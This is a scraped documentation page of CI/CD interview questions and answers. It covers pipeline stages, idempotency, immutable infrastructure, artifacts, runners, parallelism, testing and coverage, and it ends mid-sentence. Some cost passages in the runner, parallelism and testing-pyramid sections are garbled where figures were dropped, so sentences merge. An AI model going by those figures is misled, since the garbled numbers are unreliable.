Documentation Index
Fetch the complete documentation index at: https://resources.devweekends.com/llms.txt
Use this file to discover all available pages before exploring further.
CI/CD Interview Questions (60+ Detailed Q&A)
1. Concepts & Pipelines
1. CI vs CD vs CD
1. CI vs CD vs CD
- CI (Continuous Integration): Developers merge code to a shared branch frequently (multiple times per day). Every merge triggers an automated build and test run. The goal is to detect integration bugs within minutes, not days. In practice, this means your team maintains a green trunk — if the build breaks, it’s the top priority. At companies like Google, the CI pipeline runs ~800M test cases per day across their monorepo.
- CD (Continuous Delivery): Every commit that passes CI produces a deployable artifact (Docker image, JAR, binary). The artifact could go to production at any moment, but a human makes the final call. Think of it as “always releasable.” Netflix practices this — every merged commit produces a baked AMI that’s ready for production, but a release engineer clicks the button.
- CD (Continuous Deployment): Zero human gates. Every commit that passes the full pipeline (unit tests, integration tests, security scans, canary analysis) automatically deploys to production. GitHub deploys to production 80+ times per day this way. The prerequisite is extreme confidence in your test suite and observability.
- “Why would a company choose Continuous Delivery over Continuous Deployment?” Regulatory environments (healthcare, finance) often require audit trails with human sign-off. SOC 2 compliance may mandate a change approval record. Also, if your test coverage is below ~80% or you lack production observability, full deployment is reckless — you’re deploying without a safety net. Some teams also need coordinated releases across multiple services where a human orchestrator makes the timing call.
- “What’s the hardest part of moving from Delivery to Deployment?” Database migrations and backward-compatible schema changes. Code rollback is easy (deploy the previous artifact), but you can’t un-run a migration that dropped a column. Teams need to adopt expand-and-contract migration patterns. The second hardest part is building enough trust in the test suite — one flaky test that blocks production deploys and the team loses faith in the whole system within a week.
- “How do you handle a hotfix in a Continuous Deployment setup?” Same pipeline, no shortcuts. The hotfix commit goes through the same CI/CD pipeline but the pipeline is fast enough (under 15 minutes) that this isn’t painful. If your pipeline takes 45 minutes and you need a hotfix in 10, that’s a pipeline speed problem to fix, not a reason to add a bypass lane. Some teams maintain a “fast track” pipeline profile that runs only critical tests for hotfix branches, but this is a calculated risk.
2. Idempotency in DevOps
2. Idempotency in DevOps
- Non-idempotent:
mkdir flowfails on the second run.echo "line" >> configappends duplicates.INSERT INTOcreates duplicate rows. A deploy script thatcurls a binary and moves it into place might leave partial files on failure. - Idempotent:
mkdir -p flowsucceeds every time.INSERT ... ON CONFLICT DO NOTHING. Terraform’sapplycompares desired state to current state and only makes necessary changes. Ansible modules check current state before acting (e.g.,aptmodule checks if the package is already installed before running install).
-
“Give me an example where lack of idempotency caused a production incident.”
Classic scenario: a database migration script that adds a column runs during deploy. Deploy fails after migration but before app startup. Pipeline retries, migration runs again, crashes with “column already exists.” Now the deploy is stuck — the migration can’t re-run and the app can’t start without the migration. Fix: every migration should check preconditions (
IF NOT EXISTS), or use a migration tool like Flyway that tracks which migrations have already been applied. -
“How do you make a shell script idempotent?”
Guard every mutating operation with a check. Use
grep -qbefore appending to files. Useid -u usernamebeforeuseradd. Usetest -fbefore downloading files. Use lock files for operations that shouldn’t overlap. Better yet, replace shell scripts with declarative tools (Ansible, Terraform) that handle idempotency natively. Shell scripts become maintenance nightmares at scale because every new line needs its own idempotency guard. -
“Is a Docker build idempotent?”
Mostly yes, but with caveats.
RUN apt-get update && apt-get install -y curlmight install different versions of curl on different days because the package index changes. Pinning versions (curl=7.88.1-1) makes it idempotent. Using--no-cachemakes it reproducible but slower. The build itself is deterministic given the same inputs, but “same inputs” is harder to guarantee than people think.
3. Pipeline Stages
3. Pipeline Stages
- Checkout — Pull source code. Validate branch protections.
- Install Dependencies —
npm ci(notnpm install— deterministic). Cachenode_modulesusing lockfile hash. - Lint / Format Check — ESLint, Prettier,
gofmt. Fast (seconds). Fail early on style issues. This catches 20% of PR comments automatically. - Compile / Build — TypeScript compilation, Go build, Webpack bundle. Catches type errors, import issues.
- Unit Tests — Fast, isolated. Target < 3 minutes. Fail fast. These run in parallel across test shards.
- SAST (Static Application Security Testing) — SonarQube, Semgrep. Catch SQL injection patterns, hardcoded secrets, insecure crypto usage. Runs on source code, not running app.
- SCA (Dependency Scan) — Snyk, Dependabot. Check
package-lock.json/go.sumagainst CVE databases. Block on Critical/High CVEs. - Package — Build Docker image. Multi-stage build to minimize image size. Tag with git SHA (not
latest). - Container Scan — Trivy, Clair. Scan image layers for OS-level vulnerabilities.
- Publish Artifact — Push to ECR/GCR/Artifactory. This artifact is immutable — same image promotes through all environments.
- Deploy to Dev — Automatic. Kubernetes apply or Helm upgrade.
- Integration Tests — Service + real database. API contract tests. Target < 10 minutes.
- Deploy to Staging — Mirror of production. Same instance types, same configurations.
- E2E Tests — Cypress/Playwright. Full user journeys. Target < 15 minutes. Quarantine flaky tests.
- Performance Tests — K6/Locust. Regression check against baseline latency. Run on staging with production-like load.
- Security Gate / Manual Approval — Required for regulated environments. Change ticket auto-created.
- Deploy to Prod — Canary/Blue-Green. Automated rollback on error spike.
- Smoke Tests — Post-deploy. Hit health endpoints. Verify critical user flows. Alert on failure.
- Notify — Slack notification, DORA metrics update, deployment record.
- “Your pipeline takes 45 minutes. How do you cut it to 15?” First, measure where time goes (usually tests and Docker builds). Parallelize unit tests across shards. Cache Docker layers and dependencies aggressively. Run independent stages concurrently (lint + unit tests + SAST in parallel). Use test impact analysis to only run tests affected by changed files. Move E2E tests to a post-merge pipeline so they don’t block PRs. Replace full Docker rebuilds with layer caching. At Shopify, they cut CI from 25 minutes to 5 minutes by sharding tests and caching aggressively.
- “Which stages are mandatory vs. nice-to-have?” Non-negotiable: build, unit tests, SAST, artifact publish, deploy. Nice-to-have but highly recommended: integration tests, E2E, container scanning, performance tests. The line depends on risk tolerance. A startup shipping an internal tool can skip E2E. A payments company processing $1M/day cannot skip security scans.
- “How do you handle a stage that’s flaky but important?” Quarantine it. Run it in a non-blocking parallel track. Report results but don’t fail the pipeline. Track flakiness rate. If a test fails > 5% of runs without code changes, it’s flaky. Fix the root cause (usually test isolation, timing dependencies, or shared state). Never just add retries without investigating — that hides real failures.
4. Mutable vs Immutable Infrastructure
4. Mutable vs Immutable Infrastructure
- Mutable Infrastructure: You SSH into running servers and modify them in place.
apt-get update, edit config files, restart services. The problem: after 6 months, no two servers are identical. This is configuration drift. Server A got a hotfix in March that Server B missed. Server C has a different OpenSSL version because an engineer ran a manual update during an incident. When you try to scale or reproduce an issue, you can’t because each server is a unique snowflake. This is sometimes called “pet” servers — you name them, nurture them, and panic when they get sick. - Immutable Infrastructure: You never modify a running server. Instead, you build a new machine image (AMI, Docker image, VM snapshot) with all changes baked in, deploy it alongside the old one, shift traffic, and terminate the old one. Every server is identical because they came from the same image. This is “cattle” servers — they’re numbered, replaceable, and you don’t care which specific one serves a request.
- Reproducibility: Any environment can be recreated from the image + config.
- Rollback: Deploy the previous image. No need to reverse-engineer what changed.
- Security: No SSH access means smaller attack surface. Servers are read-only at runtime.
- Debugging: “Which server has the bug?” is answered by “all of them or none of them.”
apt-get install taking seconds). More complex image build pipelines. Need a strategy for config that varies per environment (inject via environment variables or config services, never bake secrets into images).Red flag answer: “Immutable means you can’t change anything.” This misses the point — you can change everything, you just do it by replacing the whole unit rather than modifying in place. It’s a deployment strategy, not a limitation.Follow-up:- “How do you handle configuration that differs between environments with immutable infrastructure?” The image is the same across dev, staging, and production. Environment-specific config is injected at runtime via environment variables, ConfigMaps (Kubernetes), Parameter Store (AWS SSM), or a config service like Consul. Secrets come from Vault or AWS Secrets Manager, never baked into the image. The principle: the artifact is immutable, the configuration is not.
- “What about emergency patches? Isn’t immutable slower for hotfixes?” Yes, marginally. Building a new image takes 3-5 minutes vs SSH + patch in 30 seconds. But the SSH hotfix creates drift, isn’t tracked, might not be applied to all servers, and definitely won’t be in the next deploy. The “slow” immutable path is actually faster when you count the hours spent debugging drift-related issues. Netflix deploys hundreds of times per day with fully immutable AMIs — speed comes from pipeline optimization, not from shortcuts.
- “Can containers be considered immutable infrastructure?” Yes, containers are the most common implementation of immutable infrastructure. A Docker image is a read-only filesystem. If a container is modified at runtime, those changes disappear when it restarts. Kubernetes enforces this naturally — pods are ephemeral and replaceable. The anti-pattern is mounting writable volumes for application code or shelling into running containers to modify behavior.
5. Configuration Management vs Provisioning
5. Configuration Management vs Provisioning
- Provisioning (Infrastructure as Code): Creating and managing the infrastructure itself. VPCs, subnets, load balancers, databases, DNS records, IAM roles. Tools: Terraform (multi-cloud, declarative, state-based), CloudFormation (AWS-only, YAML/JSON), Pulumi (general-purpose languages like TypeScript/Python instead of HCL). You’re answering: “What infrastructure exists?”
- Configuration Management: Installing software, configuring OS settings, managing services on already-provisioned machines. Tools: Ansible (agentless, SSH-based, push model), Chef (Ruby DSL, agent-based, pull model), Puppet (declarative, agent-based, pull model), Salt (Python, event-driven). You’re answering: “How is this machine configured?”
- “When would you use Ansible over Terraform, and vice versa?” Terraform for anything that has a lifecycle (create, update, destroy) and state — infrastructure resources. Ansible for procedural tasks on existing machines — installing packages, copying files, running scripts. If you need to SSH into a box and configure it, that’s Ansible. If you need to create the box itself, that’s Terraform. For Kubernetes-native workloads, you might skip both and use Helm + ArgoCD.
-
“What happens when Terraform state drifts from reality?”
Someone manually changed a resource in the AWS console.
terraform planwill show the drift and propose changes to reconcile. You canterraform importto bring manually-created resources into state, orterraform refreshto update state to match reality. The real fix is preventing drift: lock down console access, require all changes through IaC, use drift detection tools (Driftctl, Spacelift) to alert on manual changes. - “Is configuration management still relevant in a containerized world?” Less so than before. Containers bake configuration into images at build time. Kubernetes handles orchestration and desired-state management. But configuration management isn’t dead — it’s still essential for managing the nodes themselves (Kubernetes worker node setup), legacy systems not yet containerized, and bare-metal infrastructure. Even in a fully containerized setup, someone has to configure the host OS, install container runtimes, and manage certificates.
6. Monorepo vs Polyrepo CI
6. Monorepo vs Polyrepo CI
-
Monorepo (Single repo, multiple projects/services):
- CI Challenge: A change to a shared library could break 50 services. You need smart change detection: “Did
/packages/auth-libchange? Rebuild all services that depend on it.” Tools: Nx, Turborepo, Bazel, Lerna. Without this, every commit rebuilds everything (Google’s monorepo has ~2 billion lines of code — they run ~150M+ builds/day using Bazel’s dependency graph). - Pros: Atomic cross-service changes (update an API contract and all consumers in one PR). Shared tooling and CI config. Easier code reuse. Consistent dependency versions.
- Cons: CI complexity scales with repo size. A broken shared test blocks everyone. Requires investment in custom tooling. Git performance degrades at extreme scale (Meta uses a custom VCS).
- CI Challenge: A change to a shared library could break 50 services. You need smart change detection: “Did
-
Polyrepo (One repo per service):
- CI is simple: Repo change = pipeline runs. No dependency graph needed. Each team owns their pipeline.
- Pros: Clear ownership boundaries. Independent deploy cadence. Smaller CI scope.
- Cons: “Dependency hell” — Service A depends on shared-lib v2.1, Service B on v2.3. Cross-repo changes require coordinated PRs across multiple repos. Shared CI configuration is copy-pasted and drifts. Versioning of internal libraries becomes a major coordination cost.
-
“How do you implement affected-project detection in a monorepo?”
Build a dependency graph of projects. On each PR, compute which files changed (
git diff --name-only), map those files to projects, then traverse the dependency graph upward to find all affected projects. Nx does this withnx affected. Turborepo uses content hashing. Bazel uses fine-grained build targets. The dependency graph can be static (declared in config) or dynamic (inferred from import statements). - “How do you handle a monorepo where CI takes 2 hours?” Remote caching (share build artifacts across developers and CI — if someone already built the same input hash, reuse the output). Distributed task execution (spread test shards across machines). Affected-only builds (skip unchanged projects). Separate critical-path tests (run fast tests in PR pipeline, slow tests post-merge). At Vercel, Turborepo’s remote cache reduced average CI from 45 minutes to 7 minutes by avoiding redundant work.
- “Can you mix monorepo and polyrepo?” Yes, and many companies do. A common pattern: monorepo for the core platform (10 tightly-coupled services), polyrepo for independent services or experimental projects. Shared libraries are published as versioned packages from the monorepo and consumed by polyrepo services. The key is having a clear boundary for what goes in the monorepo vs. not.
7. Artifact Management
7. Artifact Management
- Build once, deploy everywhere. The artifact built in CI is the exact same binary that runs in dev, staging, and production. Never rebuild per environment — that risks subtle differences (different dependency versions resolved at build time, different build flags).
- Immutability. Once published, an artifact version is never overwritten.
v1.2.3always points to the same bytes. If you need a fix, publishv1.2.4. Overwriting artifacts is how “but it worked in staging” incidents happen. - Versioning. Tag artifacts with the git SHA (
myapp:a1b2c3d) for traceability, and optionally with semver for release management. Never uselatestin production — it’s ambiguous and non-reproducible.
- Container registries: ECR (AWS), GCR/Artifact Registry (GCP), ACR (Azure), Docker Hub, Harbor (self-hosted).
- Package registries: Nexus, Artifactory (both support multiple formats — Maven, npm, PyPI, Docker).
- Language-specific: npm registry, PyPI, Maven Central, Go modules proxy.
- Retention policies: Delete artifacts older than 90 days except tagged releases. ECR lifecycle policies automate this. Without cleanup, storage costs grow linearly and registries slow down.
- Vulnerability scanning: Scan artifacts on push and on a recurring schedule (new CVEs are discovered daily for already-published images).
- Promotion model: Artifacts flow
dev -> staging -> prodvia metadata/tags, not by rebuilding. Some teams use separate registries per environment with promotion policies.
-
“What happens if your artifact registry goes down during a deploy?”
If using Kubernetes, existing pods keep running (images are already pulled and cached on nodes). New pods can’t start because they can’t pull the image. Mitigation: use
imagePullPolicy: IfNotPresent(notAlways) for tagged images (never forlatest), run a local registry mirror/cache (Harbor can proxy Docker Hub), and ensure your registry has multi-AZ redundancy. Some teams pre-pull critical images to all nodes as part of deployment prep. -
“How do you trace a running container back to its source code?”
Tag images with the git SHA. Add OCI labels to the Dockerfile:
LABEL org.opencontainers.image.revision=$GIT_SHA. Usedocker inspectto read labels. For full provenance, implement SLSA (Supply-chain Levels for Software Artifacts) which creates a signed attestation linking the artifact to the exact source commit, build config, and builder identity. -
“How do you handle artifact promotion across environments?”
Option 1: Same registry, different tags. Build produces
myapp:a1b2c3d. After staging tests pass, add tagmyapp:staging-approved. After prod smoke tests, addmyapp:prod-release-2024-01-15. Option 2: Separate registries per environment with a promotion pipeline that copies the image. The key is that the image bytes never change — only the metadata changes.
8. Self-hosted vs SaaS Runners
8. Self-hosted vs SaaS Runners
-
SaaS Runners (GitHub Actions hosted, GitLab.com shared, CircleCI cloud):
- Pros: Zero maintenance. No patching, no scaling, no hardware procurement. Pay-per-minute pricing. Instant availability.
- Cons: Shared execution environment (your code runs on machines other tenants also use — potential side-channel attacks). Limited hardware specs (typically 2 vCPU, 7GB RAM for free tier). No access to private network resources (can’t reach your VPC database without a VPN/tunnel). Costs explode at scale — a team running 10K pipeline-minutes/day at 2,400/month.
- Security risk: Supply chain attacks via shared infrastructure. If a compromised action runs on a shared runner, it could potentially access cached credentials from other workflows. GitHub mitigates this with ephemeral runners, but the attack surface exists.
-
Self-hosted Runners (Jenkins agents, GitHub Actions self-hosted, GitLab runners on your infra):
- Pros: Full hardware control (GPU for ML builds, high-memory for large compilations). VPC access (can reach private databases, internal APIs). Cheaper at scale (an m5.xlarge spot instance costs ~0.48/hr for GitHub Actions large runner). Custom tooling pre-installed. Compliance requirements satisfied (data never leaves your network).
- Cons: You own the maintenance — patching, scaling, monitoring, disk cleanup. Runners accumulate state between jobs unless you make them ephemeral. Need auto-scaling (Kubernetes-based runners via Actions Runner Controller or GitLab Runner on K8s) to avoid over-provisioning.
- “How do you make self-hosted runners secure and ephemeral?” Run runners in containers or VMs that are destroyed after each job. On Kubernetes, use the Actions Runner Controller (ARC) which spins up a new pod per workflow run and deletes it after. On AWS, use autoscaling groups with spot instances that launch fresh for each job and terminate after. Never persist state between jobs — a compromised job could poison the cache for the next job. Disable Docker socket mounting unless absolutely necessary.
-
“How do you handle auto-scaling for self-hosted runners?”
Kubernetes-based: ARC scales runner pods based on pending workflow queue depth. AWS-based: Lambda webhook listens for
workflow_jobevents, scales an ASG up, runner picks up the job, ASG scales down on idle. Key metrics: queue wait time (jobs waiting for a runner), runner utilization (avoid paying for idle runners), and job failure rate due to runner unavailability. - **“Your team spends 0.10/hr running 10 jobs/hr vs $0.48/hr per job on Actions saves 80%. Long-term: optimize the pipeline itself — fewer tests, faster builds, smarter affected detection.
9. Pipeline as Code
9. Pipeline as Code
Jenkinsfile, .github/workflows/ci.yml, .gitlab-ci.yml, bitbucket-pipelines.yml, or .circleci/config.yml. This file is version controlled, peer reviewed in PRs, and its history is traceable via git log.Why it matters:- Auditability: “Who changed the deploy pipeline and when?” is answered by
git blame. In Jenkins’s old UI-configured jobs, changes were untraceable and unreviewable. - Reproducibility: Any branch can have its own pipeline definition. Feature branches can modify CI without affecting main. You can test pipeline changes before merging.
- Disaster recovery: If your CI server dies, you rebuild it and all pipeline definitions are already in Git. With UI-configured pipelines, you’d need backups of the CI server’s database.
- Reusability: Shared pipeline templates (GitHub Actions reusable workflows, GitLab CI
include, Jenkins shared libraries) let platform teams provide standardized pipelines that product teams extend.
- Storing secrets in pipeline files (use secret managers and inject at runtime).
- Pipeline YAML that’s 2,000 lines long (break into reusable components).
- No tests for the pipeline itself (a broken pipeline blocks the entire team).
-
“How do you test a pipeline change before merging to main?”
On GitHub Actions: push the workflow change to a feature branch and it runs with the new definition. On Jenkins: use
Jenkinsfilein a multibranch pipeline — each branch runs its ownJenkinsfile. For complex pipeline changes, use a sandbox/test repo that mirrors the structure. Some teams have a “pipeline linter” in CI that validates YAML syntax and checks for common mistakes before the pipeline even runs. -
“How do you share pipeline logic across 50 microservices?”
GitHub Actions: reusable workflows (
.github/workflows/shared-deploy.ymlin a central repo,uses: org/shared-pipelines/.github/workflows/deploy.yml@v2). GitLab CI:includewith remote YAML files. Jenkins: shared libraries in Groovy. The platform team owns the shared pipeline and versions it. Product teams pin to a specific version and upgrade on their own schedule. This is critical — a breaking change to a shared pipeline shouldn’t break 50 services simultaneously. -
“What’s the biggest operational risk with Pipeline as Code?”
A developer can modify the pipeline in their PR to exfiltrate secrets, skip security scans, or deploy to production from a feature branch. Mitigation: use
CODEOWNERSto require platform team approval for workflow file changes. On GitHub Actions, usepull_request_targetcarefully (it runs with main branch secrets, not PR branch secrets). On Jenkins, useJenkinsfilefrom the trusted branch, not from the PR.
10. Fan-out / Parallelism
10. Fan-out / Parallelism
- Parallel stages: Lint, unit tests, SAST, and dependency scan run simultaneously because they’re independent. A 3-minute lint + 5-minute test + 4-minute SAST takes 5 minutes total instead of 12.
- Test sharding: Split 3,000 unit tests across 10 runners. Each runs 300 tests. Total time: ~1/10th of sequential. Tools: Jest
--shard, pytest-xdist, Go’s-countwith test splitting, CircleCI’s test splitting, GitHub Actions matrix. - Matrix builds: Test across multiple configurations simultaneously. Node 18, 20, 22. Ubuntu, macOS, Windows. Python 3.9, 3.10, 3.11. GitHub Actions
strategy.matrixgenerates N jobs from a single definition. - Fan-out / Fan-in: Run parallel jobs, then wait for all to complete before proceeding. Build 5 microservice images in parallel (fan-out), then deploy them all together (fan-in after all builds succeed).
- Shared state: Parallel tests that read/write the same database table will cause flakiness. Each shard needs its own test database or uses transactions that roll back.
- Resource contention: 10 parallel jobs on a 4-CPU runner means each job gets slow. Match parallelism to available resources.
- Cost: Matrix of 3 OS x 3 versions = 9 jobs. At 0.72 per run. At 100 runs/day = 2,160/month. Be intentional about which combinations to test.
- Debugging: When 1 of 10 parallel shards fails, you need clear log isolation to find the failure without sifting through 9 successful shards.
- “How do you split tests evenly across shards?” Naive: alphabetical or file-count split. Problem: test files vary wildly in duration. Better: record test execution times from previous runs, then use timing-based splitting (CircleCI does this automatically). JUnit XML reports contain timing data. Split so each shard’s total time is roughly equal. At scale, use a test orchestrator service that dynamically assigns tests to shards as they become available (like Launchable or BuildPulse).
- “What’s the tradeoff between more parallelism and cost?” Diminishing returns. Going from 1 shard to 4 cuts time by ~75%. Going from 4 to 8 cuts by another ~50% of remaining time. Going from 8 to 16 adds cost but test overhead (setup, teardown, result aggregation) starts to dominate. Find the knee of the curve where cost/minute-saved starts increasing. For most teams, 4-8 shards for unit tests and 2-4 for E2E is the sweet spot.
-
“How do you implement fan-in in GitHub Actions?”
Use the
needskeyword. Jobsbuild-a,build-b,build-crun in parallel. Jobdeployhasneeds: [build-a, build-b, build-c]and only runs when all three succeed. For conditional fan-in (deploy even if one non-critical job fails), useif: always()combined with checking individual job outcomes vianeeds.build-a.result == 'success'.
2. Testing Strategies
11. The Testing Pyramid
11. The Testing Pyramid
- Base — Unit Tests (~70%): Test a single function, class, or module in isolation. Mock external dependencies. Execution time: milliseconds per test. These are your first line of defense and the foundation of developer confidence. A team with 5,000 unit tests that run in 2 minutes has a tight feedback loop.
- Middle — Integration Tests (~20%): Test interactions between components. Service + database. Service A calling Service B. No mocks for the components under test. Execution time: seconds per test. These catch the bugs that unit tests miss — “the function works correctly in isolation, but the SQL query it generates doesn’t match the actual schema.”
- Top — E2E Tests (~10%): Full user journey through the real UI with real services. Selenium, Cypress, Playwright. Execution time: 10-60 seconds per test. These catch the bugs that integration tests miss — “the API works but the frontend sends the wrong request format.”
- For API-only services with no UI, the pyramid becomes: unit tests + integration tests (heavy) + contract tests. No E2E.
- For frontend-heavy apps, the “Testing Trophy” (Kent C. Dodds) emphasizes integration tests over unit tests because testing React components in isolation provides less confidence than testing user interactions.
- For data pipelines, the pyramid inverts — you need heavy integration/E2E testing because unit testing a SQL transformation in isolation doesn’t catch schema mismatches.
-
“Your team has 90% code coverage but bugs still reach production. Why?”
Coverage measures lines executed, not behaviors validated. A test that calls a function without asserting the result contributes to coverage but catches nothing. Mutation testing (Stryker, PIT) is a better quality signal — it changes your code and checks if tests catch the mutation. If you mutate
>to>=and no test fails, your tests are weak. Also, coverage can’t catch integration issues — the function works correctly but was called with the wrong arguments by the caller. - “When would you deliberately violate the testing pyramid?” When the risk profile demands it. A payments service handling 100K+ in chargebacks) far exceeds the cost of slower pipelines. Conversely, an internal admin tool used by 5 people can rely mostly on unit tests and manual smoke testing.
- “How do you convince a team with no tests to adopt the pyramid?” Start from the middle, not the bottom. Integration tests provide the most confidence-per-effort for a team with no testing culture. Write 10 integration tests covering the critical API endpoints. The team immediately sees bugs caught. Then introduce unit tests for new code (not retroactive — refactoring without tests to add tests is risky). E2E tests come last, covering only the 5 most critical user journeys. The key is demonstrating value quickly, not achieving perfect coverage.
12. Unit vs Integration vs E2E
12. Unit vs Integration vs E2E
-
Unit Tests: Test a single function, class, or module in total isolation. All external dependencies (database, HTTP clients, file system, clock) are mocked or stubbed. You’re testing pure logic: “Given this input, does this function return the correct output?”
- Example: Testing a
calculateDiscount(price, customerTier)function with various inputs. - Speed: Thousands per second. A Go project can run 10,000 unit tests in under 5 seconds.
- Weakness: Mocks can diverge from real behavior. You test that
processPaymentcallsstripe.charge()with the right arguments, but you don’t verify Stripe actually accepts those arguments.
- Example: Testing a
-
Integration Tests: Test the interaction between two or more real components. Typically service + database, service + message queue, or service A calling service B.
- Example: Testing that
UserRepository.findByEmail()executes the correct SQL and returns a properly mapped domain object from a real PostgreSQL instance (using Testcontainers to spin up a Postgres container). - Speed: Seconds per test. A suite of 200 integration tests might take 3-5 minutes.
- Weakness: Slower, need infrastructure (databases, queues). Test isolation is harder — tests sharing a database can interfere with each other.
- Example: Testing that
-
E2E Tests: Test the full user journey through the real system, including the UI. A real browser interacts with a real frontend, which calls real APIs, which hit a real database.
- Example: “User logs in, adds an item to cart, enters payment info, completes checkout, receives confirmation email.” Using Playwright or Cypress.
- Speed: 10-60 seconds per test. A suite of 100 E2E tests might take 30-60 minutes.
- Weakness: Flaky (network timing, UI rendering delays, third-party service flakiness). Expensive to write and maintain. Failures are hard to diagnose — which layer broke?
- “How do you decide where to draw the mocking boundary in integration tests?” Mock things you don’t own and can’t control: third-party APIs (Stripe, SendGrid), external services with rate limits, non-deterministic services (weather APIs). Don’t mock things you own and want to verify: your own database, your own message queue, your own service-to-service calls. The goal is to test the integration you built, not the integration with someone else’s system. For third-party APIs, use contract tests or sandbox environments instead of mocks when possible.
-
“Your E2E tests have a 15% flake rate. How do you fix this?”
First, quarantine flaky tests — move them to a non-blocking suite so they stop eroding trust. Then systematically fix root causes: replace
sleep(3000)withwaitFor(() => element.isVisible()). Use network request interception to wait for API calls to complete instead of arbitrary delays. Isolate test data so tests don’t interfere with each other. Use retry logic at the assertion level (Playwright’s auto-waiting). Track flakiness metrics per test — if a test flakes more than 5% over 30 days, it’s either a real intermittent bug or a bad test. Fix or delete it. - “Should microservices test each other’s behavior, or just their contracts?” Contracts. Each service should have its own integration tests covering its own behavior. Cross-service verification should happen via contract tests (Pact) — the consumer defines what it expects, and the provider verifies it can satisfy those expectations. Running full E2E across 20 microservices is brittle, slow, and expensive. Contract tests give 80% of the confidence at 10% of the cost.
13. Smoke Testing / Sanity Testing
13. Smoke Testing / Sanity Testing
-
Smoke Testing (“Is the building on fire?”): The bare minimum check after deployment to verify the system is alive and the most critical path works. Origin: hardware testing — if you plug it in and smoke comes out, stop. In software: “Can the homepage load? Can a user log in? Does the health endpoint return 200? Can we connect to the database?”
- When: Immediately after every deployment. Automated. Takes 1-2 minutes max.
- Scope: 5-10 critical checks. Not comprehensive. If smoke tests fail, you rollback immediately without further investigation.
- Example: After deploying a checkout service — hit
/health, verify database connectivity, place one test order through the API, verify the response. Total time: 45 seconds.
-
Sanity Testing (“Does the specific thing we changed work?”): A targeted check on the specific feature or fix that was just deployed. Not a full regression.
- When: After deploying a specific change. Often manual or semi-automated.
- Scope: Focused on the changed functionality. “We fixed the coupon code bug — does the coupon code flow work now?”
- Difference from smoke: Smoke tests are generic and run every deploy. Sanity tests are specific to what changed.
- “What makes a good smoke test vs. a bad one?” Good: tests the critical path (login, core transaction, health check), runs in under 2 minutes, has zero external dependencies that could cause false failures, is deterministic. Bad: tests edge cases (admin panel, rare error handling), takes 10 minutes, depends on third-party services being available, has flaky assertions. A smoke test that cries wolf (false positive) is worse than no smoke test — the team learns to ignore it.
-
“How do you implement automated smoke tests that run post-deployment in Kubernetes?”
Use a Kubernetes Job or a Helm post-install hook. The job runs a container with your smoke test script (curl commands, Playwright headless checks, or a custom test runner). The job reports success/failure to the deployment controller. If using ArgoCD, configure a
PostSynchook that runs smoke tests after deployment. If the hook fails, ArgoCD can trigger a rollback. Alternatively, use Argo Rollouts with anAnalysisRunthat executes smoke tests as part of the canary promotion criteria. - “Your smoke tests pass but users are reporting errors. What happened?” The smoke tests aren’t testing the right things. Common causes: smoke tests hit a cached response (not a live endpoint), tests use a test user that bypasses authentication logic, tests don’t verify downstream dependencies (the API returns 200 but the data is stale because the cache layer is serving old data). Fix: smoke tests should exercise the full request path, use realistic inputs, and verify response content (not just status codes). Add synthetic monitoring (Datadog Synthetics, New Relic Synthetics) that continuously runs user journey checks from external locations.
14. Code Coverage
14. Code Coverage
if/else paths taken), function coverage (% of functions called).The nuanced take:- Coverage is a negative indicator, not a positive one. Low coverage (< 40%) definitely means inadequate testing. High coverage (90%+) does not mean good testing. You can hit 100% line coverage with zero assertions — the code runs but nothing is verified.
- The useful range is 60-85%. Below 60%, there are significant untested code paths. Above 85%, you’re fighting diminishing returns — the last 15% is often error handling, edge cases, and generated code that’s expensive to test and low-risk.
- Branch coverage matters more than line coverage. Line coverage can be 90% while missing critical
elsebranches. A function withif (isAdmin)might have the admin path tested but not the non-admin path.
- Mutation testing (Stryker, PIT): Introduce small code changes (mutations) and check if tests catch them. A mutation score of 80% means 80% of mutations were detected — this measures test quality, not just test quantity.
- Test failure on real bugs: Track how often your tests catch bugs before production. If bugs regularly slip through despite 90% coverage, your tests are testing the wrong things.
- “A developer writes tests with no assertions to hit the coverage target. How do you prevent this?” Use mutation testing as a quality gate alongside coverage. Tests with no assertions will have a low mutation score because they can’t detect code changes. Also, code review is the human safeguard — reviewers should check that tests assert meaningful behavior, not just that they exist. Some teams use custom linting rules to flag test functions without assertions.
- “How do you handle coverage for legacy code with 10% coverage?” Don’t mandate 80% retroactively — that’s a multi-month effort that will produce low-quality “coverage padding” tests. Instead, use a ratchet: coverage must not decrease on any PR. New code must have > 80% coverage. Over time, as old code is touched and refactored, coverage naturally increases. Track the trend on a dashboard. In 6-12 months, the codebase will be at 50-60% with meaningful tests.
-
“What code should you explicitly exclude from coverage metrics?”
Generated code (protobuf, GraphQL codegen, ORM models), configuration files, migration scripts, test utilities/helpers themselves, vendor/third-party code, and trivial code (simple getters, data classes with no logic). Most coverage tools support ignore annotations (
/* istanbul ignore next */in JS,//nolintin Go). Be explicit about exclusions and review them periodically to ensure real logic isn’t being hidden behind ignore comments.
15. Static Analysis (Linting)
15. Static Analysis (Linting)
- Formatting / Style: Consistent code style across the team. Prettier (auto-format), Black (Python), gofmt (Go — not optional, it’s part of the language). Eliminates “tabs vs spaces” code review comments. This should be enforced via pre-commit hooks, never debated in PRs.
- Linting / Code Quality: ESLint (JS/TS), pylint/ruff (Python), golangci-lint (Go), RuboCop (Ruby). Catches: unused variables, unreachable code, missing error handling, deprecated API usage, complexity violations (cyclomatic complexity > 15 = probably needs refactoring).
- Type Checking: TypeScript compiler, mypy (Python), Flow. Catches: type mismatches, null pointer potential, incorrect function signatures. TypeScript alone prevents ~15% of bugs that would otherwise make it to runtime (based on studies).
- Security (SAST): SonarQube, Semgrep, CodeQL (GitHub), Bandit (Python), gosec (Go). Catches: SQL injection patterns, XSS vulnerabilities, hardcoded secrets, insecure crypto usage, path traversal risks. Semgrep lets you write custom rules: “flag any SQL string concatenation that isn’t using parameterized queries.”
- Architecture / Dependency: ArchUnit (Java), deptry (Python), eslint-plugin-import. Catches: circular dependencies, forbidden imports (frontend importing backend code), architectural boundary violations.
-
“How do you introduce linting to a codebase with 10,000 existing violations?”
Don’t fix them all at once. Use a “ratchet” approach: record the current violation count as a baseline. CI fails if the count increases. Developers fix violations as they touch files. Over months, the count naturally decreases. Some tools support this natively (ESLint
--max-warnings, SonarQube quality gates with “new code” scope). Alternatively, useeslint-disablecomments on existing violations and track them as tech debt. -
“What’s the difference between SAST and a linter?”
Linters focus on code quality, style, and common mistakes. SAST tools focus on security vulnerabilities. There’s overlap — both might flag
